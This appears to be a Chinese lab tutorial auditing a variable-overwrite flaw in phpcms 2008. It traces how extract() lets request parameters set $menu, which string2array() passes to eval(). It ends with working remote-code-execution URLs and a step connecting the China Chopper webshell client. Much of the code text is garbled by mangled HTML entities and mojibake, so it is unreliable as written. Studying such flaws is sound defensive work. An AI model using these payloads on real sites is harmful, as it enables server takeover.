phpcms2008变量覆盖漏洞

一、 启动环境

1.双击运行桌面phpstudy.exe软件

2.点击启动按钮&＃xff0c;启动服务器环境

二、代码审计

1&＃xff0e;双击启动桌面Seay源代码审计系统软件

3&＃xff0e;点击新建项目按钮&＃xff0c;弹出对画框中选择&＃xff08;C:\phpStudy\WWW\ phpcms 2008&＃xff09;&＃xff0c;点击确定

漏洞分析

1&＃xff0e;点击展开/yp/web/include/common.inc.php

defined(&＃39;IN_PHPCMS&＃39;) or exit(&＃39;Access Denied&＃39;);$userid &＃61; $userid ? $userid : intval(QUERY_STRING);
$r &＃61; $db->get_one("SELECT * FROM &＃96;".DB_PRE."member_company&＃96; WHERE &＃96;userid&＃96;&＃61;&＃39;$userid&＃39;");
if($r)
{extract($r);
}if(!$userid)
{$MS[&＃39;title&＃39;] &＃61; &＃39;浣犺璁块棶鐨勭珯鐐逛笉瀛樺湪&＃39;;$MS[&＃39;description&＃39;] &＃61; &＃39;璇锋牳瀵圭綉鍧€鏄惁姝&＃xff47;‘.&＃39;;$MS[&＃39;urls&＃39;][0] &＃61; array(&＃39;name&＃39;&＃61;>&＃39;璁块棶缃戠珯棣栭〉&＃39;,&＃39;url&＃39;&＃61;>$PHPCMS[&＃39;siteurl&＃39;],);$MS[&＃39;urls&＃39;][1] &＃61; array(&＃39;name&＃39;&＃61;>&＃39;娉ㄥ唽涓烘湰绔欎細鍛?,&＃39;url&＃39;&＃61;>$PHPCMS[&＃39;siteurl&＃39;].&＃39;member/register.php&＃39;,);msg($MS);
}


程序首先赋值一个$userid变量\&＃xff0c;然后使用赋值完成变量拼接sql语句执行\&＃xff0c;SQL语句执行完成以后返回数据给$r变量数组&＃xff0c;如果$r变量存在内容\&＃xff0c;则将变量数组内容加入到当前文件的符号表中。如果$userid变量内容为false则将显示错误页面内容&＃xff0c;但是目前$userid并没有找到在哪里获取。2.如果$userid不为false&＃xff0c;则接着往下执行

if(empty($tplname)) $tplname &＃61; &＃39;default&＃39;;
//用户选择的默认模板
$companytpl_config &＃61; include PHPCMS_ROOT.&＃39;templates/&＃39;.TPL_NAME.&＃39;/yp/companytplnames.php&＃39;;$tpl &＃61; $companytpl_config[$tplname][&＃39;tplname&＃39;];define(&＃39;TPL&＃39;, $tpl);
define(&＃39;WEB_SKIN&＃39;, &＃39;templates/&＃39;.TPL_NAME.&＃39;/yp/css/&＃39;);
if($diy)
{define(&＃39;SKIN_DIY&＃39;, WEB_SKIN.$userid.&＃39;_diy.css&＃39;);
}
else
{define(&＃39;SKIN_DIY&＃39;, WEB_SKIN.$companytpl_config[$tplname][&＃39;style&＃39;]);
}
$menu &＃61; string2array($menu);


代码接着进行初始化模板文件&＃xff0c;最后将$menu变量传输到string2array\&＃xff08;\&＃xff09;函数\&＃xff0c;目前又来疑问\&＃xff0c;$menu变量从何而来&＃xff1f;
3.现在需要了解一下string2array()到底什么作用&＃xff0c;string2array函数存放在include/global.func.php

function string2array($data)
{if($data &＃61;&＃61; &＃39;&＃39;) return array();eval("\$array &＃61; $data;");return $array;
}


看到函数发现&＃xff0c;内部有eval敏感函数&＃xff0c;并且把传送过去的$menu进行执行\&＃xff0c;现在有这么个假设\&＃xff0c;如果$menu变量可以控制&＃xff0c;那么完全进行任意代码执行。
4&＃xff0e;目前成立这个假设$userid主要是为了去数据库查询内容\&＃xff0c;然后将返回的内容构成一个数组\&＃xff0c;使用extract\&＃xff08;\&＃xff09;将数组的内容添加到当前符号表中\&＃xff0c;从而也就生成$menu变量&＃xff0c;如果能够让数据库返回空&＃xff0c;不让他覆盖或者生成新的$menu变量\&＃xff0c;然后在别的位置生成新的$menu变量&＃xff0c;从而执行想执行代码。
5&＃xff0e;在include/common.inc.php文件中&＃xff0c;会将GET、POST、COOKIE转换成变量

if($_REQUEST)
{if(MAGIC_QUOTES_GPC){$_REQUEST &＃61; new_stripslashes($_REQUEST);if($_COOKIE) $_COOKIE &＃61; new_stripslashes($_COOKIE);extract($db->escape($_REQUEST), EXTR_SKIP);}else{$_POST &＃61; $db->escape($_POST);$_GET &＃61; $db->escape($_GET);$_COOKIE &＃61; $db->escape($_COOKIE);&＃64;extract($_POST,EXTR_SKIP);&＃64;extract($_GET,EXTR_SKIP);&＃64;extract($_COOKIE,EXTR_SKIP);}if(!defined(&＃39;IN_ADMIN&＃39;)) $_REQUEST &＃61; filter_xss($_REQUEST, ALLOWED_HTMLTAGS);if($_COOKIE) $db->escape($_COOKIE);
}


所以可以利用这个位置提前生成$menu变量和$userid变量&＃xff0c;并且把$userid内容置位数据库不存在的内容\&＃xff0c;$menu变量内容为想要执行的代码。

漏洞利用

1.访问

http://192.168.91.136/phpcms/yp/web/index.php?userid&＃61;1234324&menu&＃61;phpinfo();exit;


菜刀直接连接

http://192.168.91.136/phpcms/yp/web/index.php?userid&＃61;1234324&menu&＃61;exit;
//密码 menu